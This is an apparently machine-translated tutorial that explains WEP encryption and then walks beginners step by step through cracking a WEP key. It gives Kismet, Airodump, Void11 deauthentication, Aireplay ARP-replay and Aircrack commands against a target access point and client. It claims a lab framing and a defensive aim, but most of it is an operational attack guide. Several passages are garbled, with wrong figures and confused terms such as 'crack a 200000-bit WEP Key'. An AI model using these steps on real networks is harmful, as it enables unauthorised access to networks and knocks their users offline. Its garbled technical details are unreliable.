After the emergence of WLAN technology, "security" has always been a shadow around the word "wireless". Attacks and cracking against security authentication and encryption protocols involved in wireless network technology have emerged. Currently, there may be hundreds or even thousands of articles on how to attack and crack WEP on the Internet, but how many people can truly break WEP's encryption algorithm? Next I will introduce some knowledge about WEP encryption methods, as well as the methods that cainiao can successfully crack the WEP Key as long as they follow the steps. Of course, the ultimate goal is to enable reporters to set security settings to better prevent cracking attacks.
I. WEP: the initial protector of Wireless Network Security
Compared with wired networks, data is more easily eavesdropped when sent and received over a wireless LAN. To design a complete Wireless LAN system, encryption and authentication are two essential security factors. The most fundamental purpose of applying encryption and authentication technology in a wireless LAN is to enable wireless businesses to reach the same security level as wired businesses. To address this goal, the standard adopted the WEP (Wired Equivalent Privacy: Wired peer-to-peer confidentiality) Protocol to set up a special security mechanism for business flow encryption and node authentication. It is mainly used for the confidentiality of link layer information data in Wireless LAN. WEP adopts symmetric encryption mechanism, and data encryption and decryption adopts the same key and encryption algorithm. WEP uses an encryption key (also known as the WEP Key) to encrypt the data portion of each packet exchanged on the 802.11 Network. After encryption is enabled, two 802.11 devices must have the same encryption key and be configured with encryption. If one device is configured to use encryption and the other device does not, communication fails even if the two devices have the same encryption key. (1)
Figure 1: WEP Encryption
WEP encryption process
WEP supports 64-bit and 128-bit encryption. For 64-bit encryption, the encryption key is 10 hexadecimal characters (0-9 and A-F) or 5 ASCII characters; for 128-bit encryption, the encryption key is 26 hexadecimal characters or 13 ASCII characters. 64-bit encryption is sometimes called 40-bit encryption; 128-bit encryption is sometimes called 104-bit encryption. 152-bit encryption is not a standard WEP technology and is not widely supported by client devices. WEP relies on the keys shared by both parties to protect the encrypted data. The data encryption process is as follows.
1. Check Summing ).
(1) Integrity Verification and calculation of input data.
(2) combine the input data with the calculated checksum to obtain the new encrypted data, also known as plaintext, which serves as the input for the next encryption process.
2. encryption. In this process, the plaintext data obtained in the first step is encrypted using an algorithm. Encryption of plaintext has two meanings: encryption of plaintext data to protect unauthenticated data.
(1) run the 24-bit initialization vector and the 40-bit key connection for verification and calculation to obtain the 64-bit data.
(2) input the 64-bit data to the virtual random number generator, which encrypts the checksum and calculation values of the initialization vector and key.
(3) The plaintext and the output encrypted stream of the virtual random number generator after verification and calculation are encrypted by bitwise XOR operation, that is, the ciphertext.
3. transmission. Concatenates the initialization vector and ciphertext to obtain the encrypted data frame to be transmitted and transmit it on the wireless link. (2)
Figure 2: WEP encryption process
WEP decryption process
In the security mechanism, the decryption process of the encrypted data frame is only a simple inverse of the encryption process. The decryption process is as follows.
1. Restore the initial plaintext. Re-generate a cipher stream and perform an exclusive or operation on the received ciphertext information to restore the initial plaintext information.
2. Check the checksum. The receiver checks the checksum Based on the restored plaintext information, separates the restored plaintext information, recalculates the checksum, and checks whether it matches the received checksum. This ensures that only data frames with correct checksum will be accepted by the receiver.
Figure 3: WEP decryption process
Ii. Preparations before cracking the WEP Key
In the following two sections, I will gradually introduce how to crack the WEP Key. This method does not require any special hardware devices. It only requires two (only one) laptops with wireless NICs, the entire attack process only uses shared and free software and does not require professional tools. Readers who understand this article and learn how to operate do not need to be a network expert, but must be familiar with some network terms and basic principles. At least, you should know how to ping another machine to test whether the network is smooth and open a Windows Command Prompt window, know how to enter related commands and learn about Windows Network Properties window. This is the basic requirement. Otherwise, how can we call it a method that cainiao can learn.
1. Create an experiment environment
Before we begin, our first step was to build an experimental environment where you could not use others' networks to crack your work. This would violate the law and be an immoral act. To build a wireless network platform in an experimental environment, Wireless AP is indispensable. In addition, three laptops with wireless NICs can also be used on desktops with wireless NICs) A simple network can meet the requirements. Figure 4 shows the network topology.
Figure 4: Create an experiment environment
In the network shown in figure 4, we use a NETGEAR product named wgt624v2 for the selection of Wireless AP. It will act as the target of the attack in the future, it will be called the target AP later. Among the three machines used, one is the client machine that serves as the target of the attack, which is now called "target". The other two laptops perform active attacks to generate network traffic, so that many packets can be captured within a short period of time, and this machine is called "attack "; the remaining notebook is used to sniff and capture packets generated by active attacks. It is called "sniff ". Of course, although the entire cracking process can be completed in a notebook, I do not recommend this practice. using only one notebook will make future work very troublesome, in addition, if this method is used, eavesdropping may cause a small problem. In a low-usage WLAN, the chance of using active attacks is greater than that of passive detection. It can generate more packets for the WLAN in a short period of time, thus accelerating the cracking of WEP.
In this lab environment, you must use a notebook. We can also use a desktop PC or desktop PC to mix with a notebook. However, if you use a notebook, it has better portability, it also provides better compatibility with the current wireless PC Card.
The wireless network card used by Target has nothing to do with the chip. As long as it is based on 802.11b, any manufacturer's products can meet the requirements. The Attack and Sniff machines use two PRISM chip-based 802.11b wireless NICs. Although many tools (such as Kismet) used in subsequent operations can support a wide range of wireless network adapters, we recommend using a PRISM 2 Chip-based network adapter, this chip can be supported by all the tools we need to use during the cracking process.
Wireless NICs generally have two types of antennas: External antennas and built-in antennas. If the purchased wireless NICs do not have built-in antennas, you must purchase another one. However, the advantage of an external antenna is higher gain and better sensitivity. It can adjust the direction of the antenna to receive better signals. The built-in antenna can be carried more conveniently, the disadvantage is that the antenna direction cannot be adjusted. I have seen a mobile external antenna, which is very convenient to use. There are several small cups of rubber material at the bottom of the mobile antenna, it can be easily adsorbed on the top of the notebook. If it is used in the car, it can also be firmly sucked on the blank window glass of the car. See Figure 5.
Figure 4: Mobile Antenna
2. Experiment WLAN settings
It is very important to set up this experiment environment properly, because we only want to complete all the operations in this experiment environment. In the attack process described below, A client connected to the AP will be forcibly terminated. This attack may cause serious damage to wireless users in the neighboring region. To prevent users from being attacked, it is to protect users who do not belong to the lab WLAN. If the operating environment is located in a complex office, office building, or other area covered by many wireless networks, try this solution, please wait until no one is working at night and the network is no longer busy to avoid "fire in the city, affecting the pool ".
The first step is to connect and set the wireless LAN of the attacked experiment. As described above, this WLAN includes an Access Point (wireless router) and only one wireless client, the wireless LAN is protected by the WEP Key we want to crack. Set the SSID (System Set ID) of the target AP to "starbucks". The SSID is used to distinguish different networks, also known as network names. The wireless workstation must display the correct SSID, which is the same as the SSID of the Wireless Access Point AP to access the AP. If the displayed SSID is different from the ap ssid, then the AP will refuse to access the Internet through the service area. It can be considered that the SSID is a simple password, which provides a password mechanism to achieve certain security. And configure a 64-bit WEP Key on this WAP for protection.
Record the following information for future use.
① MAC address of the AP. It is usually displayed on the WEB configuration menu of the AP, and the local MAC address may also be recorded on the bottom or side of the AP.
② The SSID of the AP.
③ AP wireless channels ).
④ WEP Key. If the key displayed by the Wireless AP is in a format like 0xFFFFFFFFFF (replace the set value with the value of F), write down each letter except 0x.
The second step is to connect the Target client to the Target AP. Now we need to connect this client to the target AP for further configuration (the following are all in Windows XP), right-click the "Network Neighbor" icon on the desktop, you can also click "start", click "properties", double-click "Wireless Network Connection", and open the window shown in Figure 5. Multiple available Wireless networks are displayed, however, if there is only one wireless network, only the newly configured AP named "starbucks" may be displayed in this window. Double-click the corresponding SSID name to connect to the target AP.
Figure 5: connect to the target WLAN
Because the AP has enabled WEP protection, Windows requires a password (6) during connection ), enter the WEP Key you just set (paste it from the notepad or Wordpad document). After a while, Windows will report that it has been connected to the network. Check whether the connection is successful. ping a computer in a wired network to test the connection. or, if the WLAN of this experiment has been connected to the Internet, open a WEB site and check whether the site can be connected. If you cannot successfully ping a machine with a known address or cannot open a normal WEB site, open the properties of the wireless network card and click "support, check whether a correct IP address has been obtained on the wireless network. If not, check whether the DHCP server in the network is enabled, check whether the TCP/IP attribute of the wireless network adapter is set to "automatically obtain the IP address". If everything is normal, click "Repair" in the wireless connection to correct it.
Figure 6: Enter the WEP Key
Step 3: record the MAC address of the Target machine. Once successfully connected to the network, the MAC address of the Target computer under attack is recorded. There are two methods. One is to open a command prompt window and enter the ipconfig/all command to view the MAC address, the content of this window is shown in Figure 7 (the MAC address of the wireless network card is displayed in High Brightness ).
Figure 7: Enter the ipconfig/all command to find the MAC address
In Windows XP, you can obtain the MAC address from the "wireless connection status" window, click "support", and then click "details ", the MAC address is displayed on the right side of the window (shown in Figure 8). Of course, different machines may display different names, in addition, the computer may display descriptive information such as "physical address. In this window, the letters and numbers that constitute the MAC address are separated by dashes. The purpose of dashes is to make these characters clearer, however, the actual MAC address does not have these dashes.
Figure 8: MAC address displayed in network connection details
3. Laptop settings
First, we need to prepare several tools (Kismet, Airodump, Void11, Aireplay, and Aircrack) required to crack the WEP Key. Kismet is used to scan the WLAN throughout the region, find the target WLAN used in the experiment and collect relevant data (SSID value, channel, AP, and MAC address of the client connected to it); Airodump: scans the target WLAN and captures the data packets it generates to a file. Void11: verifies a computer from the target AP and forces the client to connect to the target AP again, to make it an ARP request; Aireplay: accept these ARP requests and send them back to the target AP, and intercept the ARP request as a valid client; Aircrack: accept the capture file generated by Airodump and extract the WEP Key from it.
They are shared or free software with open source code. All these tools can be found on a shared CD called "Auditor Security Collection live cd, this disc is a boot system disc that can guide an improved Kanotix Linux. This Linux version requires no hard disk access and is directly installed in the memory when it is started, it can automatically detect and configure multiple wireless NICs after startup. The Auditor Security Collection live cd used in this article is the latest version, and the version number is auditor-150405-04. It is burned for recorder (or other recording software, attack and Sniff machines each.
First, insert the wireless network card into the notebook (if the machine has a built-in wireless network card, it is better), then set the notebook to boot from the CD, and put Auditor Security Collection CD into the optical drive. After selecting the appropriate screen resolution from the Auditor boot menu, Kanotix Linux will be installed in the memory and run and the Auditor Start Screen appears (9 shown ).
Figure 9: Start Screen of Auditor
In this Auditor system, the two most important icons are the Programs and Command Line icons located in the lower-left corner of the screen. Many of our subsequent operations will basically be completed through them. 10.
Figure 10: Position of Program and Command Line
Before doing anything else, make sure that the wireless network adapter on our machine can pass Auditor verification. Click the Command Line icon to open a Command Line window, and enter the iwconfig Command. In the information displayed by Auditor, you will see information about "Wlan0, it is a name determined by Auditor Based on the card of the PRISM chip. If the screen of the laptop used to operate the attack shows the window shown on the 11th, it indicates that Auditor has detected the wireless network card, now you can start the next step. Repeat the same steps for another notebook.
Figure 11: Use the iwconfig command to check the wireless network card
Iii. Actual CRACKING PROCESS
1. Use Kismet for network detection
Kismet is a Linux-based wireless network scanning program. It is a very convenient tool to find the target WLAN by measuring the wireless signals around it. Although Kismet can also capture data communication on the network, there are other better tools (such as Airodump ), here, we only use it to confirm whether the wireless network adapter works normally and to scan the wireless network, in the following sections, we will use different tool software to truly listen for and capture data communication on the network.
Click the Programs icon, then Auditor, then Wireless, then composer/Analyzer, and finally Kismet to run the Kismet program. 12.
Figure 12: Run Kismet
In addition to scanning the wireless network, Kismet can capture packets in the network to a file for later analysis and use. Therefore, Kismet will ask the location of the file used to store the captured packets, to save these files to root \ desktop, click "Desktop" and select "OK", as shown in Figure 13. Then Kismet will ask the name of the prefix of the capture file. We can change the default name, for example, change it to "capture" and then click OK, in this way, Kismet will start with capture as the file name, and then add the sequence number to save the captured packets to different files.
Figure 13: Specify the file storage location in Kismet
When Kismet starts running, it will display all wireless LAN addresses it finds in this region, the content displayed in the "Name" column is the SSID value of the AP in the WLAN, then, of course, the target WLAN should also contain (the row with the Name value of starbucks). In this row, the value of the CH column (the channel used by the AP) it should be the same as the one written at the beginning. The information displayed on the rightmost side of the window is the number of WANs found by Kismet, the captured data packets, the number of encrypted data packets, and so on. See Figure 14. If Kismet finds many adjacent Access points, you should move the experiment environment farther away from these aps or disconnect any high-gain antenna connected to your Internet.
Even when the target computer is disabled, Kismet can detect data packets from our target AP because the target AP keeps sending "beacons ", it tells the computer with a wireless network card that there is an AP in this range. As we can imagine, this AP announced, "My name is XXXXX. Please connect with me."
Figure 14: content displayed by Kismet
The default Kismet runs in autofit mode, and the display content is disorganized. We can sort the APS in any meaningful and ordered order, press "s" to go to the "Sort" menu, where you can press a letter to Sort the searched AP, for example, the "f" Key is sorted by the first letter of the AP name, and the "c" Key is sorted by the channel used by the AP, "l" is sorted by time and so on.
Now let's take a look at the details of the AP in the target WLAN, press the "S" key, and then press the "c" key to sort the entire AP list by channels, move the highlighted key to the SSID that indicates the target AP, and then press the Enter key, A description window (SSID, MAC address, and channel) showing the details of the selected AP is displayed ). In this way, most of the basic information required to crack the WEP Key for an encrypted WLAN is here. As shown in the 15th. Some WLAN security tests hide the SSID or shield the SSID broadcast, which can prevent the use of netstumbler for scanning, but there is no way to hit kismet, it can easily detect hidden SSID. Kismet can capture more network information than netstumbler, and discover the SSID of an AP by tracking the session between the AP and the client connected to it.
Figure 15: Kismet displays details of an AP
The last piece of information to be learned is the MAC address of the Wireless Client Connected to the target AP in the WLAN. Kismet is easy to use. Return to Kismet and press "Q" to exit the Details window. The default option is still the target AP you just viewed. Use the "Shift + C" key, A list of clients related to the target AP is opened, and their MAC addresses are displayed on the left of the window. . The content displayed in this window not only contains the MAC address of the client connected to the AP, but also the MAC address of the AP, do you still remember the MAC address of the target AP recorded at the beginning of this article? In this case, the MAC address of the target AP is the client's MAC address.
Figure 16: Use Kismet to find the MAC address of the client
If you do not see the MAC address of the target computer, check whether it is on or connected to the target AP (start the target computer, connect to the target AP and open the web page ), about 10-30 seconds later, you will see the MAC address of the target computer pop-up in kismet. Of course, writing down the MAC addresses of all clients is also an old method, which can avoid blocking when a client does not appear during the cracking process.
2. capture data packets with airodump
Now we know the basic information needed for cracking. It's time to start using the Airodump tool. The main task of Airodump is to capture data packets and create a file containing captured data for Aircrack. On either of the two computers used for Attack and cracking, I use the Attack computer. Open a shell window and enter the following command:
Iwconfig wlan0 mode monitor Iwconfig wlan0 channel THECHANNELNUM Cd/ramdisk Airodump wlan0 cap |
Note: change the value of THECHANNELNUM to the number of channels in the WLAN to be cracked. The/ramdisk directory is the location where the captured data files are stored. If there is another WAP near the WLAN environment in the experiment, you can attach the MAC address of the target AP to the back of the airodump command as a parameter, for example, airodump wlan0 cap1 MACADDRESSOFAP. 17.
Figure 17: Airodump Command Format
This command only enables airodump to write the captured data packet from the target AP to the generated data file (cap1 ). Press Ctrl + C to exit Airodump, enter the ls-l command to list the contents in this directory, and check the size of the file with the extension. cap. After several seconds of capture, if a packet is successfully captured, the generated package file is about several KB. If Airodump uses the same parameter to stop or start a packet capture, the generated package file will be added in the order of the previous file. For example, if the first package is cap1, the second is cap2.
When Airodump is running, the following BSSID values displayed on the left of the window are the MAC address of the target AP. In the run window of this Airodump, we will see that the Packet and IV values are constantly increasing, because Windows detects normal network communication during the network, this is true even if the target client does not open a WEB page to send and receive emails. After a while, we will see that the IV value will only rise a few times. However, if you browse the Web page on the target computer, as each new page opens, the IV value in Airodump is constantly increasing. 18.
Figure 18: IV value displayed by Airodump
Here, we are not interested in the Packet value because it does not help to crack WEP. The IV value is a very important number, because if we want to crack a 64-bit WEP key, capture About 50000 to 200000 IV, and crack a 200000-bit WEP Key requires about 700000 to IV.
You may notice that the IV value will not grow very fast under normal network communication conditions. In fact, in normal communication conditions, to successfully crack the WEP key, it may take several hours or even several days to capture enough packets from most WANs. Fortunately, there are several ways to increase the speed. The most effective way to quickly increase the IV value is to increase network traffic, make the target WLAN busy, and speed up data packet generation, by continuously pinging a computer or downloading a large file on the target computer, you can simulate this process and run Airodump on the Attack computer. You can see that the IV value is rising slowly, use the btsoftware to download a large file (such as a distributed Linux system. ISO files or movies), so that the IV value increases much faster.
Another method is to enter the following command in the Windows Command Prompt window for continuous ping:
Ping-t-l 50000 ADDRESS_OF_ANOTHER_LAN_CLIENT
Here, the ADDRESS_OF_ANOTHER_LAN_CLIENT value is changed to the IP address of the target AP, router, or any other client that can be pinged in the local area network.
3. Use Void11 to generate more communication traffic
Void11 uses a mandatory verification process for a wireless client from the AP connected to it, that is, the client is disconnected. When it is disconnected from the WLAN, the wireless client automatically tries to reconnect to the AP. During this reconnection, data communication is generated. This process is usually called de-authentication or deauth attack.
Start the Sniff computer and insert Auditor CD into its optical drive. After Auditor is started, open a shell command window and enter the following command:
Switch-to-hostap Cardctl eject Cardctl insert Iwconfig wlan0 channel THECHANNELNUM Iwpriv wlan0 hostapd 1 Iwconfig wlan0 mode master Void11_penetration-D-s MACOFSTATION-B MACOFAP wlan0 |
Note: replace thechannelnum with the number of channels of the target WLAN. Replace macofstation and macofap with the MAC address of the client and the AP code of the target WLAN respectively. The format is void11_penetration-d-s 00: 90: 4b: C0: C4: 7f-B 00: C0: 49: BF: 14: 29 wlan0. When void11 is run in auditor security collection CD, the error message "invalid argument error" may be displayed. This does not matter. Ignore this error.
When void11 runs on the sniff computer, let's take a look at the changes being made on the target computer. Generally, users who use this machine will find that the network suddenly becomes very slow, finally, it seems to have paused. After a few seconds, the connection to the network is completely lost. If you check the wireless client utility that comes with Windows XP, you will find that everything is normal before the void11 attack starts. Windows shows that you are connected to the AP. After void11 is started, the network status changes from the connection status to the disconnected status. 19. If void11 is stopped on the sniff computer, the target computer reconnects to the target AP in about a few seconds.
Figure 19: the target computer is disconnected
Let's go to the attack computer and check that it always runs airodump there. After void11 is running, the IV value increases by about 100-200 in a few seconds, this is because the network communication occurs when the target client machine tries to reconnect to the target AP.
4. Data Packet Delay Caused by Aireplay
When a deauth attack process is used to force communication, it usually does not produce enough IV values we need. However, airodump is suitable for tools that interfere with normal WLAN operations. To generate more network communication traffic, we need to use a different method called replay attack to intercept valid data packets generated by the target client, then, the client is spoofed by some means, and data packets are delayed in three places. This delay process is more frequent than normal use. Because the communication traffic seems to come from a valid client on the network, it does not interfere with normal network operations, but is quietly engaged in generating more IV Responsibilities behind the scenes.
Capture the Data Packet Generated by deauth attack of void11, stop the deauth attack process, and then start a replay attack process using the captured data packets. The best packet we want to capture during the cracking process is the ARP packet, because they are very small (68 bytes long) and have a fixed and easy to detect format. Restart Attack and Sniff. Attack only runs aireplay, which is only used to generate data traffic (and IV) in the network) to shorten the time used to crack the WEP key, the Sniff computer is not used to run deauth attack (through Void11), but to capture communication traffic (through Airodump ), finally, use the Aircrack tool to crack the captured data.
Start Aireplay first, open a shell window on the Attack computer, and enter the following command (as shown in Figure 20 ):
Switch-to-wlanng
Cardctl eject
Cardctl insert
Monitor. wlan wlan0 THECHANNELNUM
Cd/ramdisk
Aireplay-I wlan0-B MACADDRESSOFAP-m 68-n 68-d ff: ff
Note: switch-to-wlanng and monitor. wlan are script commands from Auditor CD to simplify operations and reduce input. Change THECHANNELNUM to the number of channels of the target WLAN. Let's take a look at the results of this operation command. First, nothing is too exciting. We can see that the Aireplay report has captured some types of data packets, however, these data packets are basically not what we need (the target MAC address is a 68-byte packet of FF: FF ).
Figure 20: Start Aireplay
Now, operate the Target computer, open its wireless utility, monitor its network connection status, and start a void11 deauth attack on the Sniff computer. Once void11 is started, at this time, we can see that the Targets computer has been disconnected from the target AP. Of course, the data packet rate displayed by Aireplay has increased faster.
After capturing the relevant data packets, Aireplay will ask if they match what you want. In this attack, the data packets we need to capture have the following features:
FromDS-0
ToDS-1
BSSID-MAC address of the target AP
Source MAC-MAC address of the target computer
Destination MAC-FF: FF
If the data packet does not match these conditions, input n (indicating no) and Aireplay will capture the data packet again. After aireplay successfully finds the data packet that matches the preceding conditions, in response to y (yes), Aireplay will switch from capture to replay mode and start the replay attack. Immediately return to the Sniff computer to stop the deauth attack of void11. 21.
Figure 21: matched data packets captured by Void11
If Aireplay does not capture the corresponding data packet in thousands of data packets, you can use Void11 for assistance. Void11 can interfere with the target AP and its clients, give them any chance to complete the reconnection. Manually stop void11 (press Ctrl + C), restart it, and add the "d" parameter to the command line of void11 (the delay value is microseconds ), try to use different values to allow the time for the AP to reconnect to the client.
If the target client is idle, it may be difficult to capture ARP packets through deauth attacks, which may not happen in a real-world WLAN, however, the WLAN environment in this experiment has become a problem. If Aireplay does not capture the expected data packet cracking, you can run a continuous ping or download task on the target client computer before starting deauth attack. If Void11 does not work properly at all, you can run aireplay on the Attack computer, disable void11 on the Sniff computer, operate on the Target computer, disconnect the wireless network, and then reconnect, within thirty seconds, when it re-connects to the WLAN and requests to obtain an IP address, the Aireplay on the Attack computer will be able to see the ARP packet sent by the target computer.
5. The final cracking time
After a period of operation, the replay Attack running on the attack computer generated enough IV, and now is the final time to crack the real WEP, and void11 is stopped on the Sniff computer, enter the following command to set Airodump to capture data packets.
Switch-to-wlanng
Cardctl eject
Cardctl insert
Monitor. wlan wlan0 THECHANNELNUM
Cd/ramdisk
Airodump wlan0 cap1
Replace THECHANNELNUM with the number of channels of the target WLAN. If there are multiple WAP addresses in this region, add the MAC address of the target AP to the end of airodump as a parameter, for example: airodump wlan0 cap1 MACADDRESSOFAP. As Airodump writes the IV into a file, we can run Aircrack simultaneously to find the WEP Key contained in the file, so that Airodump can continue to run and open another shell window, in the new command window, enter the following command to start Aircrack.
Cd/ramdisk
Aircrack-f FUDGEFACTOR-m MACADDRESSOFAP-n WEPKEYLENGTH-q 3 cap *. cap
Note: The value of FUDGEFACTOR is an integer (the default value is 2). MACADDRESSOFAP is the MAC address of the target AP. WEPKEYLENGTH is the length of the WEP Key you tried to crack (64,128, etc ). As shown in 22nd.
Figure 22: Aircrack Command Format
Aircrack reads the IV value from the captured packet file, and uses the IV value to crack the WEP Key, aircrack uses a slow mode by default to find the WEP Key. However, this mode is slow, but it has a high chance of finding the WEP Key; another mode is to use the-f parameter, which is quite fast, but the chances of success are much smaller than the previous one. If you are lucky, you will see that the WEP Key is successfully found. As shown in 23.
Figure 23: successfully cracked the WEP Key
It takes five minutes to crack a 64-bit WEP, which is composed of several operations running on replay attack at the same time: using airodump to scan, use aircrack to crack, and use aireplay to generate network communication traffic. However, there are many lucky points. Sometimes, to crack a 64-bit WEP key, you need to collect about 25000 pieces of IV, it takes longer. You must input the length of the WEP Key you are trying to recover to Aircrack. No tool can provide this length. You can certainly know this information about the WLAN in your own experiment environment, however, in other network environments that you do not know about, you can use the 64 or 128 key lengths to try.
Better configuration can help speed up the process of cracking, it is a good way to copy the captured packet file to another machine with a larger memory and a faster processor to complete the final cracking action, on this machine, you only need to run the Aircrack tool, and aircrack can use the-p option to support multi-processor. Using AMD and Intel's new dual-processor devices can make the cracking process faster. This is especially true for keys with a length of bits.